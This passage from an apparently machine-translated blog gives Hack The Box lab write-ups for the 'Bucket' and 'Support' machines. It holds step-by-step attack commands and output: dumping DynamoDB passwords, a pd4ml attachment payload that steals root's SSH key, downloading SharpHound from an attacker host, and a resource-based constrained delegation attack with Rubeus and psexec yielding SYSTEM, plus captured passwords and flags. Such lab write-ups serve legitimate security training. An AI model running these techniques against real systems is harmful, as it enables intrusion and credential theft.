-rw-r--r-- 1 roy  roy   3771 Sep 16  2020 .bashrc
drwx------ 2 roy  roy   4096 Apr  4 20:13 .cache
-rw-r--r-- 1 roy  roy    807 Sep 16  2020 .profile
drwxr-xr-x 3 roy  roy   4096 Sep 24  2020 project
-rw-rw-r-- 1 roy  roy  19286 Apr  6 01:25 result.pdf
-r-------- 1 roy  roy     33 Apr  4 20:11 user.txt

db.phpThere is.

$ ls -la /home/roy/project
ls -la /home/roy/project
total 44
drwxr-xr-x  3 roy roy  4096 Sep 24  2020 .
drwxr-xr-x  5 roy roy  4096 Apr  6 01:25 ..
-rw-rw-r--  1 roy roy    63 Sep 24  2020 composer.json
-rw-rw-r--  1 roy roy 20533 Sep 24  2020 composer.lock
-rw-r--r--  1 roy roy   367 Sep 24  2020 db.php
drwxrwxr-x 10 roy roy  4096 Sep 24  2020 vendor

/home/roy/project/db.phpMake sure you connect to DynamoDB using it.localhost:4566

/home/roy/project/db.php

<?php
require 'vendor/autoload.php';
date_default_timezone_set('America/New_York');
use Aws\DynamoDb\DynamoDbClient;
use Aws\DynamoDb\Exception\DynamoDbException;

$client = new Aws\Sdk([
    'profile' => 'default',
    'region'  => 'us-east-1',
    'version' => 'latest',
    'endpoint' => 'http://localhost:4566'
]);

$dynamodb = $client->createDynamoDb();

//todo

Configure the AWS CLI on the target machine.

$ aws configure
aws configure
AWS Access Key ID [None]: test
test
AWS Secret Access Key [None]: test
test
Default region name [None]: ue-east-1
ue-east-1
Default output format [None]: json 
json

You can connect to DynamoDB with the AWS CLI and check the list of tables in .list-tablesusers

$ aws dynamodb list-tables --endpoint-url http://localhost:4566
<db list-tables --endpoint-url http://localhost:4566
{
    "TableNames": [
        "users"
    ]
}

usersWhen I checked the table, I got some passwords.

$ aws dynamodb scan --table-name users --endpoint-url=http://localhost:4566 
<ble-name users --endpoint-url=http://localhost:4566
{
    "Items": [
        {
            "password": {
                "S": "Management@#1@#"
            },
            "username": {
                "S": "Mgmt"
            }
        },
        {
            "password": {
                "S": "Welcome123!"
            },
            "username": {
                "S": "Cloudadm"
            }
        },
        {
            "password": {
                "S": "n2vM-<_K_Q:.Aa2"
            },
            "username": {
                "S": "Sysadm"
            }
        }
    ],
    "Count": 3,
    "ScannedCount": 3,
    "ConsumedCapacity": null
}

I succeeded in SSH connection in it.n2vM-<_K_Q:.Aa2

$ ssh roy@bucket.htb
roy@bucket:/tmp$

/home/roy/user.txtI was able to get the user flag from.

$ cat user.txt 
44819fc84df2389e1093c2a15638de74

Root Flag

linpeasRun the

$ ./linpeas.sh

I found out that the number port is running locally.8000

╔══════════╣ Active Ports
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports           
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                      
tcp        0      0 127.0.0.1:4566          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:38957         0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -

Port forwarding with SSH.

$ ssh roy@bucket.htb -L 8000:127.0.0.1:8000

I was able to access the website.

Check the Apache configuration and it is configured.
If you exploit a vulnerability in this web application, it seems that you can escalate your privileges.AssignUserId root root

I also found out that the root folder is./var/www/bucket-app

/etc/apache2/sites-enabled/000-default.conf

<VirtualHost 127.0.0.1:8000>
        <IfModule mpm_itk_module>
                AssignUserId root root
        </IfModule>
        DocumentRoot /var/www/bucket-app
</VirtualHost>

/var/www/bucket-app/index.phpConfirm.

In this process, when a POST request like this arrives, it connects to and uses DynamoDB.action=get_alertslocalhost:4566

After connecting to the DB, the data is retrieved from the table.alertstitleRansomware

After that, a random HTML file is created and the data is stored under it.files/

/var/www/bucket-app/index.php

<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
        if($_POST["action"]==="get_alerts") {
                date_default_timezone_set('America/New_York');
                $client = new DynamoDbClient([
                        'profile' => 'default',
                        'region'  => 'us-east-1',
                        'version' => 'latest',
                        'endpoint' => 'http://localhost:4566'
                ]);

                $iterator = $client->getIterator('Scan', array(
                        'TableName' => 'alerts',
                        'FilterExpression' => "title = :title",
                        'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
                ));

                foreach ($iterator as $item) {
                        $name=rand(1,10000).'.html';
                        file_put_contents('files/'.$name,$item["data"]);
                }
                passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
        }
}
else
{
?>

(省略)

Finally running in.passthrupd4ml

https://qiita.com/embed-contents/link-card#qiita-embed-content__27a277064d331b5af9ce12fdd373fb2d

pd4mlis an application for Java that allows you to convert HTML to PDF.

https://qiita.com/embed-contents/link-card#qiita-embed-content__271d837b0dbd5ab555faee0dc6511087

By default, there is no table, so we will use the AWS CLI from Kali to create a table.alerts

https://qiita.com/embed-contents/link-card#qiita-embed-content__ee01da0692f64227b9a6baf474782469

$ aws --endpoint-url http://s3.bucket.htb dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5
{
    "TableDescription": {
        "AttributeDefinitions": [
            {
                "AttributeName": "title",
                "AttributeType": "S"
            },
            {
                "AttributeName": "data",
                "AttributeType": "S"
            }
        ],

(省略)

titleinserts the data.Ransomeware

$ aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"This is a test"}}'
{
    "ConsumedCapacity": {
        "TableName": "alerts",
        "CapacityUnits": 1.0
    }
}

index.phpprocess.

$ curl http://127.0.0.1:8000/index.php --data 'action=get_alerts'

Then, HTML and PDF files were created as processed./var/www/bucket-app/files

$ ls -la /var/www/bucket-app/files/
total 16
drwxr-x---+ 2 root root 4096 Apr  9 12:59 .
drwxr-x---+ 4 root root 4096 Feb 10  2021 ..
-rw-r--r--  1 root root   14 Apr  9 12:59 4094.html
-rw-r--r--  1 root root 1633 Apr  9 12:59 result.pdf

The HTML contains data from DynamoDB.

roy@bucket:/var/www/bucket-app/files$ cat 4094.html 
This is a test

If you download the PDF and check it, you can see that the HTML data has been converted to PDF.pd4ml

pd4mlIt seems that you can attach a file by examining it.<pd4ml:attachment>

https://qiita.com/embed-contents/link-card#qiita-embed-content__f284a6768b2419a04696fa704c04f678

Since the application is running, it seems that you can attach a file with root privileges and elevate privileges.root root

/root/.ssh/id_rsais attached.

$ aws --endpoint-url=http://s3.bucket.htb dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><pd4ml:attachment src='\''file:///root/.ssh/id_rsa'\'' description='\''test'\'' icon='\''Paperclip'\''/></html>"}}'
{
    "ConsumedCapacity": {
        "TableName": "alerts",
        "CapacityUnits": 1.0
    }
}

Send a POST request and have the PDF file created.

$ curl http://127.0.0.1:8000/index.php --data 'action=get_alerts'

When you download the created PDF, the file is attached.id_rsa

With the obtained private key, the root SSH connection was successful.

$ ssh root@bucket.htb -i id_rsa
root@bucket:~# whoami
root

/root/root.txtI was able to get the root flag from.

# cat /root/root.txt 
8af91c8d1e7d26954b4f4eb69f891a74

Hack The Box – Support Writeup

Hack The Box

app.hackthebox.com

This is the Writeup of HackTheBox “Support”.

User Flag

Perform a port scan.

$ nmap -Pn -sCV -A -T4 -p- -oN nmap_result 10.10.11.174
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-09 13:31:34Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
49741/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-09T13:32:36
|_  start_date: N/A
|_clock-skew: 1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

You now know the operational status of the port.

Now that I know the domain name, I will add it./etc/hosts

10.10.11.174    support.htb

I checked the DNS and found the subdomain, so I will add it to ./etc/hosts

$ dig @10.10.11.174 support.htb any

;; ANSWER SECTION:
support.htb.            600     IN      A       10.10.11.174
support.htb.            3600    IN      NS      dc.support.htb.
support.htb.            3600    IN      SOA     dc.support.htb. hostmaster.support.htb. 107 900 600 86400 3600

Start with SMB enumeration.

I’ve found that enumerating share names.support-tools

$ smbclient -N -L 10.10.11.174

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share

support-toolsWhen you go to the store, you will find multiple exe and zip files.

$ smbclient -N //10.10.11.174/support-tools
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022

UserInfo.exe.zipis suspicious, so I will download it.

smb: \> get UserInfo.exe.zip 
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (48.3 KiloBytes/sec) (average 48.3 KiloBytes/sec)

When I unzipped it, I got an executable file called.UserInfo.exe

$ ls -la
total 944
drwxrwxr-x 2 kali kali   4096 Apr 12 11:44 .
drwxrwxr-x 3 kali kali   4096 Apr 12 11:43 ..
-rw-rw-rw- 1 kali kali  99840 Mar  1  2022 CommandLineParser.dll
-rw-rw-rw- 1 kali kali  22144 Oct 22  2021 Microsoft.Bcl.AsyncInterfaces.dll
-rw-rw-rw- 1 kali kali  47216 Oct 22  2021 Microsoft.Extensions.DependencyInjection.Abstractions.dll
-rw-rw-rw- 1 kali kali  84608 Oct 22  2021 Microsoft.Extensions.DependencyInjection.dll
-rw-rw-rw- 1 kali kali  64112 Oct 22  2021 Microsoft.Extensions.Logging.Abstractions.dll
-rw-rw-rw- 1 kali kali  20856 Feb 19  2020 System.Buffers.dll
-rw-rw-rw- 1 kali kali 141184 Feb 19  2020 System.Memory.dll
-rw-rw-rw- 1 kali kali 115856 May 15  2018 System.Numerics.Vectors.dll
-rw-rw-rw- 1 kali kali  18024 Oct 22  2021 System.Runtime.CompilerServices.Unsafe.dll
-rw-rw-rw- 1 kali kali  25984 Feb 19  2020 System.Threading.Tasks.Extensions.dll
-rwxrwxrwx 1 kali kali  12288 May 27  2022 UserInfo.exe
-rw-rw-rw- 1 kali kali    563 May 27  2022 UserInfo.exe.config

UserInfo.exeseems to be an executable file written in..NET

$ file UserInfo.exe        
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

dnSpyParse with:

https://qiita.com/embed-contents/link-card#qiita-embed-content__20a7a33d8441e0a13b3659ce3faf96c3

UserInfo.ServicesI saw that it was connected to LDAP after execution.LdapQuerygetPassword()DirectoryEntry

getPassword()Let’s decrypt it.enc_password

Since LDAP communication is done in plain text, let’s capture the LDAP login process with Wireshark.

First, examine the commands in the executable file.
It seems that the argument of , is required.finduser

$ mono UserInfo.exe

Usage: UserInfo.exe [options] [commands]

Options: 
  -v|--verbose        Verbose output                                    

Commands: 
  find                Find a user                                       
  user                Get information about a user

Looks like we need more options.-username

$ mono UserInfo.exe user
Unable to parse command 'user' reason: Required option '-username' not found!

Execution succeeded.

$ mono UserInfo.exe user -username hello -v
[*] Getting data for hello
[-] Exception: No Such Object

When I checked wireshark, I was able to capture LDAP authentication packets.

bindRequestWhen I checked the packet data, I was able to confirm a string that seemed to be a password.
Since it is in the following packet, it seems that authentication is successful with this string.bindResponse success

ldapsearchLDAP enumeration in .

$ ldapsearch -x -H ldap://support.htb -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'DC=support, DC=htb' > ldapsearch_result

When I checked the results, I found a password-like string in the item.info

# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support

(省略)

info: Ironside47pleasure40Watchful

5985Since the number port is open, the connection with WinRM was successful.

$ evil-winrm -u support -p 'Ironside47pleasure40Watchful' -i support.htb

*Evil-WinRM* PS C:\Users\support\Documents> whoami
support\support

Desktop/user.txtI was able to get the user flag from.

*Evil-WinRM* PS C:\Users\support\Documents> more ..\Desktop\user.txt
2b46946973813a3227dc277318e6809d

Root Flag

Enumerate the AD environment in .
To do so, we will install it on the target machine and execute it.BloodHoundsharphound.exe

*Evil-WinRM* PS C:\Users\support\Documents> wget http://10.10.14.136/SharpHound.exe -o sharphound.exe
*Evil-WinRM* PS C:\Users\support\Documents> .\sharphound.exe

Download the created zip file and load it into BloodHound.

support@support.htbI found out that there is one > of my account.outbound object controlGroup Delegated Object Control

support@support.htbis a member of, and the group has authority over .shared support accounts@support.htbDC.support.htbGenericAll

GenericAllRight-click on the->-> to see how the permissions are abused.HelpWindows Abuse

This time, it seems that RBCD attacks can be used for privilege escalation.

ms-DS-MachineAccountQuotaYou can add up to 10 computers.10

*Evil-WinRM* PS C:\Users\support\Documents> Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota


DistinguishedName         : DC=support,DC=htb
ms-DS-MachineAccountQuota : 10
Name                      : support
ObjectClass               : domainDNS
ObjectGUID                : 553cd9a3-86c4-4d64-9e85-5146a98c868e

PowerViewVerify that you have not already configured RBCD in .

*Evil-WinRM* PS C:\Users\support\Documents> . ./PowerView.ps1
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity

name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC

PowermadCreate a fake machine to use in the attack and add it to the domain.

*Evil-WinRM* PS C:\Users\support\Documents> . ./Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Documents> New-MachineAccount -MachineAccount FAKE-COMP03 -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
[+] Machine account FAKE-COMP03 added

FAKE-COMP03I was able to add the .

*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -identity FAKE-COMP03


DistinguishedName : CN=FAKE-COMP03,CN=Computers,DC=support,DC=htb
DNSHostName       : FAKE-COMP03.support.htb
Enabled           : True
Name              : FAKE-COMP03
ObjectClass       : computer
ObjectGUID        : 75b3431a-c6ea-4069-8133-ba04103a153f
SamAccountName    : FAKE-COMP03$
SID               : S-1-5-21-1677581083-3380853377-188903654-5604
UserPrincipalName :

Add to the RDBS settings.
You can now pose as a domain administrator and issue Kerberos tickets.FAKE-COMP03FAKE-COMP03

*Evil-WinRM* PS C:\Users\support\Documents> Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount FAKE-COMP03$
*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount


DistinguishedName                    : CN=DC,OU=Domain Controllers,DC=support,DC=htb
DNSHostName                          : dc.support.htb
Enabled                              : True
Name                                 : DC
ObjectClass                          : computer
ObjectGUID                           : afa13f1c-0399-4f7e-863f-e9c3b94c4127
PrincipalsAllowedToDelegateToAccount : {CN=FAKE-COMP03,CN=Computers,DC=support,DC=htb}
SamAccountName                       : DC$
SID                                  : S-1-5-21-1677581083-3380853377-188903654-1000
UserPrincipalName                    :

S4U攻撃Run the
We will issue a ticket at .Rubeus

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe hash /password:Password123 /user:FAKE-COMP03$ /domain:support.htb

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2


[*] Action: Calculate Password Hash(es)

[*] Input password             : Password123
[*] Input username             : FAKE-COMP03$
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBhostfake-comp03.support.htb
[*]       rc4_hmac             : 58A478135A93AC3BF058A5EA0E8FDB71
[*]       aes128_cts_hmac_sha1 : 72D3D2472C10AB93EDDB8BB87C51E4A2
[*]       aes256_cts_hmac_sha1 : 560AF12B8DBBDA755C43F4492CBD19FEE8A4CAD073F94C344C7807D0BE8153B6
[*]       des_cbc_md5          : B6DFEA517A5EA7B6

The resulting hash value is used to generate a Kerberos ticket for the administrator.rc4_hmac

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe s4u /user:FAKE-COMP03$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /domain:support.htb /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2

[*] Action: S4U

[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'support.htb\FAKE-COMP03$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFhDCCBYCgAwIBBaEDAgEWooIEmDCCBJRhggSQMIIEjKADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqAD

(中略)


[*] Action: S4U

[*] Building S4U2self request for: 'FAKE-COMP03$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'FAKE-COMP03$@SUPPORT.HTB'
[*] base64(ticket.kirbi):

    doIFrDCCBaigAwIBBaEDAgEWooIExjCCBMJhggS+MIIEuqADAgEFoQ0bC1NVUFBPUlQuSFRCohkwF6AD

(中略)

[*] Impersonating user 'Administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':

      doIGaDCCBmSgAwIBBaEDAgEWooIFejCCBXZhggVyMIIFbqADAgEFoQ0bC1NVUFBPUlQuSFRCoiEwH6AD

(中略)

[+] Ticket successfully imported!

Copy the value of the last ticket, format it on the following site, and save it as .ticket.kirbi.b64

https://qiita.com/embed-contents/link-card#qiita-embed-content__434b105a298f3a94c31f853170fb5c36

Decode the saved file and save it as .base64ticket.kirbi

$ base64 -d ticket.kirbi.b64 > ticket.kirbi

Finally, convert the ticket to a format that can be used by .impacket

$ impacket-ticketConverter ticket.kirbi ticket.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done

Use the ticket to make a shell connection.
I was able to get the shell of the system account.psexec

$ KRB5CCNAME=ticket.ccache impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file mYVFUPYN.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service Tztr on dc.support.htb.....
[*] Starting service Tztr.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Users\Administrator\Desktop\root.txtI was able to get the root flag from.

C:\Windows\system32> more C:\Users\Administrator\Desktop\root.txt
ba27ef32c706d15469541c11c323dd49

Gemini Chat

GenZ Hacks

Learn and Hack to Grow

Posts Tagged → hackthebox ctf

HackTheBox – Cicada Writeup

User Flag

Root Flag

HackTheBox – Strutted Writeup

User Flag

Root Flag

Hack The Box – Bucket Writeup

User Flag

Root Flag

Hack The Box – Support Writeup

User Flag

Root Flag